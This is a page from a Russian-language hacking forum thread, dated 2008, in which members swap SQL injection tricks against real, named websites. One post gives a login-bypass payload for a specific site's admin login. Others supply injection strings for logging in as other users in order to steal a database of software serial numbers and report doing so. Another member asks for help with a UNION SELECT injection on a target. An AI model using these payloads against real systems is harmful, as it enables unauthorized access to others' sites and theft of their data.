ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2251  
Старый 10.06.2008, 09:33
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

2 sabe
По поводу MSSQL вот статья:
_https://forum.antichat.ru/thread30501.html
Вопрос такой, что в двух словах не объяснишь
 
Ответить с цитированием

  #2252  
Старый 10.06.2008, 16:39
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

спс.. будем учится..)
 
Ответить с цитированием

  #2253  
Старый 10.06.2008, 18:20
ТАРАНТУЛ
Новичок
Регистрация: 02.12.2007
Сообщений: 7
Провел на форуме:
149184

Репутация: -28
По умолчанию

Через какой путь можно замутить взлом)?? chat.bobrik.ru/?59
 
Ответить с цитированием

  #2254  
Старый 10.06.2008, 19:39
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию

http://cyberagesystems.com/member.php
на том сайте
Login: Admin
PAss : '1or'1=1

можно как админом залогинится, только что толку?
 
Ответить с цитированием

  #2255  
Старый 10.06.2008, 19:47
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

1SeTh, никакого))
Попробуй заходить под другими мемберами. там есть какая-то база серийных номеров к программным продуктам. вот их можно спереть.
 
Ответить с цитированием

  #2256  
Старый 10.06.2008, 20:28
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию

да ты прав, можно нахляву получить серийники, только мемберов то я незнаю )

еще не понятно тогда как админ редактирует контент?

Последний раз редактировалось 1SeTh; 10.06.2008 в 20:32..
 
Ответить с цитированием

  #2257  
Старый 10.06.2008, 22:07
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

1SeTh, прописать в логин и пароль что-то типа
-99' or email like '%sergey%' /* -99 для того чтобы этой записи в бд точно не было, тогда сработает конструкция or
pass'/*
за место sergey подбираем слово, которое может входить в мыло.
 
Ответить с цитированием

  #2258  
Старый 10.06.2008, 22:28
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию

Цитата:
Сообщение от AFoST  
1SeTh, прописать в логин и пароль что-то типа
-99' or email like '%sergey%' /* -99 для того чтобы этой записи в бд точно не было, тогда сработает конструкция or
pass'/*
за место sergey подбираем слово, которое может входить в мыло.
я пробовал как ты сказал, как бы ни крутил только под логином админа заходишь.

вместо слово сергей поставил пару американских имен все равно заходить под логином Admin
 
Ответить с цитированием

  #2259  
Старый 10.06.2008, 23:14
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

1SeTh, я зашел под другим логином
вбиваем
pizda' or password like '%9%'/*
pizda' or password like '%9%'/*
входим под grease2
=))))
 
Ответить с цитированием

  #2260  
Старый 10.06.2008, 23:33
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Ребят, прошу помощи.Через order by подобрал поля. Пытаюсь вывести через
index.php?ID=-19+UNION+SELECT+1,2,3/* -т.е. при неверном id, редиректит на др. страницу another.html
При запросе ID=19+UNION+SELECT+1,2,3/* не выводит ошибок, но и выводимых полей нет, id то верный.
Как можно обойти?
И вообще не первый раз встречаюсь с ситуацией,id=1593+order+by+12/* ошибка,id=1593+order+by+8/* нет ошибки,id=-1593+order+by+8/* редирект.Why?

Последний раз редактировалось Imperou$; 10.06.2008 в 23:41..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)
 


Быстрый переход




ANTICHAT.XYZ